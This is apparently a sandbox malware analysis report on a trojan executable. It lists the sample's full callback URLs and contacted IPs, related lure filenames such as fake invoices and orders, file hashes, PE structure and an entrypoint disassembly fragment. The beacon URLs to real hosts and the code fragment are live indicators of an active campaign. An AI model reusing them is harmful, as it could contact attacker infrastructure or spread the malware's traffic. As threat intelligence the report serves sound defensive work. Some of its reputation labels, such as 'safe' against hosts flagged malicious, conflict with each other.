                                                http://www.tinsley.website/dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30Wtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.matcitekids.com/dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30Wtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.extinctionbrews.com/dy8g/true
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.extinctionbrews.com/dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30Wfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.chaneabond.com/dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30Wtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.melodezu.com/dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30Wtrue
                                                • Avira URL Cloud: safe
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.tiro.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netDexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fonts.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sakkal.comexplorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    198.185.159.144
                                                                    ext-sq.squarespace.comUnited States
                                                                    53831SQUARESPACEUSfalse
                                                                    217.160.0.254
                                                                    www.surivaganza.comGermany
                                                                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                    50.87.238.189
                                                                    tinsley.websiteUnited States
                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                    52.5.43.61
                                                                    cajunseafoodstcloud.comUnited States
                                                                    14618AMAZON-AESUStrue
                                                                    64.227.87.162
                                                                    melodezu.comUnited States
                                                                    14061DIGITALOCEAN-ASNUStrue
                                                                    34.102.136.180
                                                                    extinctionbrews.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    50.87.248.20
                                                                    matcitekids.comUnited States
                                                                    46606UNIFIEDLAYER-AS-1UStrue

                                                                    General Information

                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                    Analysis ID:452405
                                                                    Start date:22.07.2021
                                                                    Start time:10:07:25
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 10m 45s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:wREFu91LXZ.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:27
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@7/0@12/7
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 15.9% (good quality ratio 13%)
                                                                    • Quality average: 67.2%
                                                                    • Quality standard deviation: 36.5%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.211.5.146, 52.147.198.201, 23.211.6.115, 104.43.193.48, 23.211.4.86, 20.82.210.154, 173.222.108.210, 173.222.108.226, 51.103.5.159, 80.67.82.211, 80.67.82.235, 40.112.88.60, 20.50.102.62
                                                                    • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net
                                                                    • Not all processes where analyzed, report is missing behavior information

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    198.185.159.144Orden de compra cotizacion.exeGet hashmaliciousBrowse
                                                                    • www.hatchethangout.com/vd9n/?b2Jda=DQ3LVDWlWtcUIlt1+CwvlUtDR5SkXT0PHl+npd08a6K4tUsO2N8Mk9PUhZ8nXrZ6VOqVJWfEOA==&pJB0=06ut_FPhn
                                                                    Inv_7623980.exeGet hashmaliciousBrowse
                                                                    • www.staydoubted.com/m6b5/?s6A=pktzo183IxXcoqS041D7E1eIfcf1CshexlvI7R5YZ4XrClTYSIFYZO6NkU07LKi7alFGzeeDww==&u4kxI=5j-Ly2Z8tz0Hwrs
                                                                    Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                    • www.groovysmoothieandjuice.com/qmf6/?4htd=UfHwMWmYBRwkI7Z+labDTmt8TnN7bBW1jO7Sb5ZOxpTJTW7jvDNawGyR05uMew8y+TGLIw==&fDHX=mjDdu2iXaB
                                                                    SMdWrQW0nH.exeGet hashmaliciousBrowse
                                                                    • www.chaneabond.com/dy8g/?7nttTz=XZ7DUzy0phYTzxkp&lVo=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6RNbTLcPGL0p8EycZw==
                                                                    TT COPY $45000 15.07.2021.exeGet hashmaliciousBrowse
                                                                    • www.miraclepawsfoundation.com/p6ai/?h2JTJt=+PzjM1NhMYGi2Wb9Hn0d3fC9h9foQ2RCKNNOQrdlkE8gE6LYJeni4s5y8VCIeiPMbHFH&XJBl=5jnLgdipVfk
                                                                    PO_8356.pdf.exeGet hashmaliciousBrowse
                                                                    • www.the427group.com/ogpo/?7n0lq=wV1bXSp1XHJfT8T6S98AytRIJMK/GRP4l/ZsjCYErbEGvOk0H3UCALrW+92LSFz5kfRapGtPbQ==&hnQLA0=d2MtV2hhcv98DBGP
                                                                    Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
                                                                    • www.chaneabond.com/dy8g/?Otx=hZrp3dQ0n&Sb=0Hs+m/QAKNZgFgMOhLHyI7vfWqidr4y2jXJwlE7hYZJX+dIO06LLnmU853NdLqEHK9AIlw==
                                                                    PDF.Requisition itemspo1123pdf.exeGet hashmaliciousBrowse
                                                                    • www.alanalevittstudio.com/gscc/?Hh=GfKPFvb&k8=jSc6B1w1nKS0Uxq6RD1v6hlgeE273fusI6vNI10ZzAxHnndtYQ10NWAsY6v2B0Iz3FRA
                                                                    Purchase Order 127008454.exeGet hashmaliciousBrowse
                                                                    • www.utrexpress.com/gscc/?_VR4=GISq5y5xA/qCQ15p4sd9yDbKxueN42KBsaZoHVqTzVOlLBMjyFN5SWfHzvrUrljRpGgL&jPh=OFQptzFhkd
                                                                    Invoice number FV0062022028.exeGet hashmaliciousBrowse
                                                                    • www.howdoivote.info/gg9g/?MN64X=vND08cHGVezTHjK75sdEZ/nmneYmPu0DqyzR++CGQ9wPNUFXpPsK86C/91Xgg79sNWP4&oTz=0Prl2jAp9lDpep
                                                                    Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                    • www.chaneabond.com/dy8g/?3f=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&XRtpal=y48HaFr
                                                                    PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                                                    • www.uluapokehouse.com/u9pi/?z658CR=aeDN/YE3ORvAzR+GWrC2+TG63pFDugwwZ19jzG1fqsa4jOVSOgKexm4OoFmfHCPkdLO8kdDrWA==&Axlx=MR-D
                                                                    vbc.exeGet hashmaliciousBrowse
                                                                    • www.laurenkilbane.com/usur/?UT=9mhm3kIAbFxl5NCfFppBjkM9d4SkiQx3jmSdu6GJUXfc0y1jZvPXleFurq0+EV1bw9KY&g0D0=2dx06l
                                                                    P0. 556117090.docGet hashmaliciousBrowse
                                                                    • www.loty-hd.com/k1rc/?N2=r5W8qzN/qHFyOC3qbzi78+WXKVvXpraIJpFafVS+Smj0a5cu+CPt7aYcqkSgYUn3ghlnOA==&Nxl0A8=5jiLRl9pajXpc
                                                                    rOFZ7NRC7X.exeGet hashmaliciousBrowse
                                                                    • www.terresdegaillac.com/rerx/?DvFXm=BoaFdp1T45ERkcs2LBIklavYyTLapdQPas2cqy1Xn5do2FthUKlw1za9mZvYOp4oyClNK04Thw==&lFQ=VN9htxGxx
                                                                    Quotation.exeGet hashmaliciousBrowse
                                                                    • www.maridaniellecontreras.com/pz9b/?x4ULcXK=W4bdvO/89GYClAMU3ffqMErimtJOpUtEbIU7G4Yx1MYUNHSd5OQFWuVJAd4dpRbzSoX2&oXnDM=9rjL3By8U2
                                                                    Lista degli ordini.exeGet hashmaliciousBrowse
                                                                    • www.theapiarystudios.com/3nop/?j6A=3frxU&GpTt=a0+gJPJox0wy2xl4ssIh5hYkacq9v+aL+esRqxMWwM8ucEZww42nY3BfWMQBFmq4gqPU
                                                                    bkeu3n7Rh4.exeGet hashmaliciousBrowse
                                                                    • www.antiqueson3rd.com/nins/?EL3LVD=hj0t+7N4NJpI43tT3BNIMCOgqjuhuFQ3ZftHsG9c1w81A2v6n8VyCeaNUYnDgkw5P1CA&r0DpbP=J8Zh4FP8nbAhHn
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • www.maridaniellecontreras.com/pz9b/?1bmDH2y0=W4bdvO/89GYClAMU3ffqMErimtJOpUtEbIU7G4Yx1MYUNHSd5OQFWuVJAeUe1hXLfJqgdERflA==&I6Aldd=sZSH
                                                                    SOA May-June 2021.exeGet hashmaliciousBrowse
                                                                    • www.boundlessoutdoorfitness.com/u8u4/?q48l=LJHr9IuKUB347jpfux0mvhweAJQOFcdn1KvNUBljmEVHl7XNdz1SBPNDJb+TGHJK0VAw&hBZ=-ZcTFHRHlRdPjZE

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    www.surivaganza.comRq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                    • 217.160.0.254
                                                                    ext-sq.squarespace.comInv_7623980.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    SMdWrQW0nH.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    TT COPY $45000 15.07.2021.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO_8356.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PDF.Requisition itemspo1123pdf.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Purchase Order 127008454.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO_0187.eml.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    e8WQrpQ6Wg.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    vbc.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    P0. 556117090.docGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    rOFZ7NRC7X.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Quotation.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    bkeu3n7Rh4.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    SOA May-June 2021.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    ZSu9Xi5VWW.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    ONEANDONE-ASBrauerstrasse48DEtPzL0MlKIoGet hashmaliciousBrowse
                                                                    • 82.165.135.254
                                                                    XfKsLIPLUuGet hashmaliciousBrowse
                                                                    • 195.20.246.158
                                                                    Reciept 2868661.xlsbGet hashmaliciousBrowse
                                                                    • 87.106.97.83
                                                                    order no. YOIMM20190832 pdf.exeGet hashmaliciousBrowse
                                                                    • 217.160.0.62
                                                                    PTELOONB39-67.exeGet hashmaliciousBrowse
                                                                    • 213.171.195.105
                                                                    mormanti.exeGet hashmaliciousBrowse
                                                                    • 217.160.182.191
                                                                    deepRats.exeGet hashmaliciousBrowse
                                                                    • 104.192.5.248
                                                                    fb6YVPzIC1.exeGet hashmaliciousBrowse
                                                                    • 74.208.236.154
                                                                    JUSTlfl.exeGet hashmaliciousBrowse
                                                                    • 213.165.67.102
                                                                    jnl3kWNWWS.exeGet hashmaliciousBrowse
                                                                    • 213.171.195.105
                                                                    3gbRJCGEoa.exeGet hashmaliciousBrowse
                                                                    • 82.223.190.139
                                                                    TnTnhIrSdN.exeGet hashmaliciousBrowse
                                                                    • 216.250.121.85
                                                                    TeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                    • 217.160.0.194
                                                                    SecurityTrend.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    UpdateToolKas.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    FixTool2.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    KASfixtool.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    UpdateKAS.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    DetectionTool.exeGet hashmaliciousBrowse
                                                                    • 212.227.94.31
                                                                    C0TEsC936Q.exeGet hashmaliciousBrowse
                                                                    • 217.160.0.101
                                                                    SQUARESPACEUSOrden de compra cotizacion.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Inv_7623980.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    SMdWrQW0nH.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    TT COPY $45000 15.07.2021.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO_8356.pdf.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Payment_Ref_Advice.xlsxGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PDF.Requisition itemspo1123pdf.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Purchase Order 127008454.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Invoice number FV0062022028.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    vbc.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    P0. 556117090.docGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    rOFZ7NRC7X.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Quotation.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Lista degli ordini.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    bkeu3n7Rh4.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    xwKdahKPn8.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.971712518685545
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:wREFu91LXZ.exe
                                                                    File size:177125
                                                                    MD5:686dc98567009e47eac88e95804b9dde
                                                                    SHA1:5788c30289d12f69d5cf323049d8d3c3a3e73cda
                                                                    SHA256:11d84c7f9c579c2e58f4acc04d488d5f1c6cc0439609099eabec42444f5ef952
                                                                    SHA512:1450afd067710a6c2385858a2d4c7a0afeb02516885ec2515de696fc89c18f985097089af39708ba0e8088547f6fcc0a6285136a5175c169be764d9ec40924ce
                                                                    SSDEEP:3072:6C/f5NIRlNlcHX0QuidYsPBpdpqbIYW/4Steoi+i1NVKlqxuk7n44QCvx7Ics0cz:RqlNlcHXbUApdJ/4+iXN0lqxNj4xC7rc
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........WuI|9&I|9&I|9&@..&B|9&I|8&T|9&@..&H|9&@..&H|9&RichI|9&........................PE..L....(.`...................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x401000
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x60F8288C [Wed Jul 21 14:00:44 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:1eef928161ef7d2982c39057cbea43bf

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000298h
                                                                    mov byte ptr [ebp-00000290h], FFFFFFE9h
                                                                    mov byte ptr [ebp-0000028Fh], FFFFFF90h
                                                                    mov byte ptr [ebp-0000028Eh], 00000000h
                                                                    mov byte ptr [ebp-0000028Dh], 00000000h
                                                                    mov byte ptr [ebp-0000028Ch], 00000000h
                                                                    mov byte ptr [ebp-0000028Bh], 00000055h
                                                                    mov byte ptr [ebp-0000028Ah], FFFFFF8Bh
                                                                    mov byte ptr [ebp-00000289h], FFFFFFECh
                                                                    mov byte ptr [ebp-00000288h], 00000056h
                                                                    mov byte ptr [ebp-00000287h], FFFFFF8Bh
                                                                    mov byte ptr [ebp-00000286h], 00000075h
                                                                    mov byte ptr [ebp-00000285h], 00000008h
                                                                    mov byte ptr [ebp-00000284h], FFFFFFBAh
                                                                    mov byte ptr [ebp-00000283h], 0000000Ah
                                                                    mov byte ptr [ebp-00000282h], 00000008h
                                                                    mov byte ptr [ebp-00000281h], 00000000h
                                                                    mov byte ptr [ebp-00000280h], 00000000h
                                                                    mov byte ptr [ebp-0000027Fh], 00000057h
                                                                    mov byte ptr [ebp-0000027Eh], FFFFFFEBh
                                                                    mov byte ptr [ebp-0000027Dh], 0000000Eh
                                                                    mov byte ptr [ebp-0000027Ch], FFFFFF8Bh
                                                                    mov byte ptr [ebp-0000027Bh], FFFFFFCAh
                                                                    mov byte ptr [ebp-0000027Ah], FFFFFFD1h
                                                                    mov byte ptr [ebp-00000279h], FFFFFFE8h
                                                                    mov byte ptr [ebp-00000278h], FFFFFFC1h
                                                                    mov byte ptr [ebp-00000277h], FFFFFFE1h
                                                                    mov byte ptr [ebp-00000276h], 00000007h
                                                                    mov byte ptr [ebp+00000000h], 00000000h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [LNK] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x30880x78.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x30000x88.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x11ae0x1200False0.505208333333data4.82202801512IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x30000x37a0x400False0.4921875data4.3639595674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Imports

                                                                    DLLImport
                                                                    GDI32.dllGetLogColorSpaceA, SetPixel, GetCharWidthI, GetWindowOrgEx, CreateDIBSection, GetBitmapBits, CombineRgn, GdiResetDCEMF
                                                                    dbghelp.dllSymSetOptions
                                                                    wsnmp32.dll
                                                                    SETUPAPI.dllExtensionPropSheetPageProc, SetupDiSetDeviceInstallParamsA, SetupScanFileQueueW, SetupDiOpenClassRegKeyExW, SetupQueryInfVersionInformationW, SetupGetLineCountW, SetupDiGetWizardPage
                                                                    COMDLG32.dllGetSaveFileNameA, GetFileTitleA, ReplaceTextW, ReplaceTextA, PrintDlgW, FindTextW

